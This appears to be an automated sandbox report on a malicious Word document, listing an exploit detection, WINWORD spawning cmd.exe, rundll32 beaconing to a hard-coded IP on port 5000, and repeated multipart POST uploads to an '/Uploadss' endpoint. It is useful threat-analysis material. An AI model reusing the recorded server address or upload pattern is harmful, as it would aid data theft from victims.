Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\cmd.exe

Source: winword.exe

Memory has grown: Private usage: 1MB later: 100MB

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\rundll32.exe

Network Connect: 172.104.160.126 5000

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknown	Network traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknown	Network traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknown	Network traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknown	Network traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknown	Network traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknown	Network traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknown	Network traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknown	Network traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknown	Network traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknown	Network traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknown	Network traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknown	Network traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknown	Network traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknown	Network traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknown	Network traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknown	Network traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknown	Network traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknown	Network traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknown	Network traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknown	Network traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknown	Network traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknown	Network traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknown	Network traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknown	Network traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknown	Network traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknown	Network traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknown	Network traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknown	Network traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknown	Network traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknown	Network traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknown	Network traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknown	Network traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknown	Network traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknown	Network traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknown	Network traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknown	Network traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknown	Network traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknown	Network traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknown	Network traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknown	Network traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknown	Network traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknown	Network traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknown	Network traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknown	Network traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknown	Network traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknown	Network traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknown	Network traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknown	Network traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknown	Network traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknown	Network traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknown	Network traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknown	Network traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknown	Network traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknown	Network traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknown	Network traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknown	Network traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknown	Network traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknown	Network traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknown	Network traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknown	Network traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknown	Network traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknown	Network traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknown	Network traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknown	Network traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknown	Network traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknown	Network traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknown	Network traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknown	Network traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknown	Network traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknown	Network traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknown	Network traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknown	Network traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49287
Source: unknown	Network traffic detected: HTTP traffic on port 49288 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49288
Source: unknown	Network traffic detected: HTTP traffic on port 49289 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49289
Source: unknown	Network traffic detected: HTTP traffic on port 49290 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49290
Source: unknown	Network traffic detected: HTTP traffic on port 49291 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49291
Source: unknown	Network traffic detected: HTTP traffic on port 49292 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49292
Source: unknown	Network traffic detected: HTTP traffic on port 49293 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49293
Source: unknown	Network traffic detected: HTTP traffic on port 49294 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49294
Source: unknown	Network traffic detected: HTTP traffic on port 49295 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49295
Source: unknown	Network traffic detected: HTTP traffic on port 49296 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49296
Source: unknown	Network traffic detected: HTTP traffic on port 49297 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49297
Source: unknown	Network traffic detected: HTTP traffic on port 49298 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49298
Source: unknown	Network traffic detected: HTTP traffic on port 49299 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49299
Source: unknown	Network traffic detected: HTTP traffic on port 49300 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49300
Source: unknown	Network traffic detected: HTTP traffic on port 49301 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49301
Source: unknown	Network traffic detected: HTTP traffic on port 49302 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49302
Source: unknown	Network traffic detected: HTTP traffic on port 49303 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49303
Source: unknown	Network traffic detected: HTTP traffic on port 49304 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49304
Source: unknown	Network traffic detected: HTTP traffic on port 49305 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49305
Source: unknown	Network traffic detected: HTTP traffic on port 49306 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49306
Source: unknown	Network traffic detected: HTTP traffic on port 49307 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49307
Source: unknown	Network traffic detected: HTTP traffic on port 49308 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49308
Source: unknown	Network traffic detected: HTTP traffic on port 49309 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49309
Source: unknown	Network traffic detected: HTTP traffic on port 49310 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49310
Source: unknown	Network traffic detected: HTTP traffic on port 49311 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49311
Source: unknown	Network traffic detected: HTTP traffic on port 49312 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49312
Source: unknown	Network traffic detected: HTTP traffic on port 49313 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49313
Source: unknown	Network traffic detected: HTTP traffic on port 49314 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49314
Source: unknown	Network traffic detected: HTTP traffic on port 49315 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49315
Source: unknown	Network traffic detected: HTTP traffic on port 49316 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49316
Source: unknown	Network traffic detected: HTTP traffic on port 49317 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49317
Source: unknown	Network traffic detected: HTTP traffic on port 49318 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49318
Source: unknown	Network traffic detected: HTTP traffic on port 49319 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49319
Source: unknown	Network traffic detected: HTTP traffic on port 49320 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49320
Source: unknown	Network traffic detected: HTTP traffic on port 49321 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49321
Source: unknown	Network traffic detected: HTTP traffic on port 49322 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49322
Source: unknown	Network traffic detected: HTTP traffic on port 49323 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49323
Source: unknown	Network traffic detected: HTTP traffic on port 49324 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49324
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 49327 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49327
Source: unknown	Network traffic detected: HTTP traffic on port 49328 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49328
Source: unknown	Network traffic detected: HTTP traffic on port 49329 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49329
Source: unknown	Network traffic detected: HTTP traffic on port 49330 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49330
Source: unknown	Network traffic detected: HTTP traffic on port 49331 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49331
Source: unknown	Network traffic detected: HTTP traffic on port 49332 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49332
Source: unknown	Network traffic detected: HTTP traffic on port 49333 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49333
Source: unknown	Network traffic detected: HTTP traffic on port 49334 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49334
Source: unknown	Network traffic detected: HTTP traffic on port 49335 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49335
Source: unknown	Network traffic detected: HTTP traffic on port 49336 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49336
Source: unknown	Network traffic detected: HTTP traffic on port 49337 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49337
Source: unknown	Network traffic detected: HTTP traffic on port 49338 -> 5000
Source: unknown	Network traffic detected: HTTP traffic on port 5000 -> 49338

Detected non-DNS traffic on DNS port

Source: global traffic

TCP traffic: 192.168.2.6:49191 -> 1.1.1.1:53

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------f9fa7306880345da
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------f13a1e66d9ac3858
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------3db099609e8ee48c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------f661165eccdedd9dExpect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------2fe595d5319db200
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4b737e61e1b7e9bf
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4e35b57d9f58fc90
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------815ab7d36e08e457
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a5d52e19e3fe200b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------ec3ba31dfe96d326
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f22aeea0bd5a0f8e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d8bdcfc228d82f5a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------cfe9280e100efce1
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------904a2babf6d2f7ac
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------f49946b6384ac060
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b85ce3e308f45060
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------614e08f55f0c2cfe
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------bea6c7b09692f28c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------23dd402f4b4a39c5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e591042c4603c21a
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a0f76a6adccf351c
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c4d90e433018b142
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------d2ca679a5d8f632b
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 763Content-Type: multipart/form-data; boundary=------------------------72fb5c35750f8204
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 160166Content-Type: multipart/form-data; boundary=------------------------43289e4b14c04ac7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 106918Content-Type: multipart/form-data; boundary=------------------------71ca7f7e591272d4
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 5243310Content-Type: multipart/form-data; boundary=------------------------727b88163de31621Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------528cb38273400043
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6ceab3228cef8607
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------a158dee7d748d662
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5e2d7668485dfa80
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0f7ba0280905d0a7
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------b615441db0569974
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------c38b6efbb3860b55
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e120409de9b0961d
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------df56891ade3f02b5
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------5b9a6ba60e763601
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------6125ed5460a004ed
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------0cd032303c66daa3
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------4103ce5fab37505e
Source: global traffic	HTTP traffic detected: POST /Uploadss HTTP/1.1Host: 172.104.160.126:5000Accept: /Content-Length: 1456Content-Type: multipart/form-data; boundary=------------------------e9d6222010bc4b93
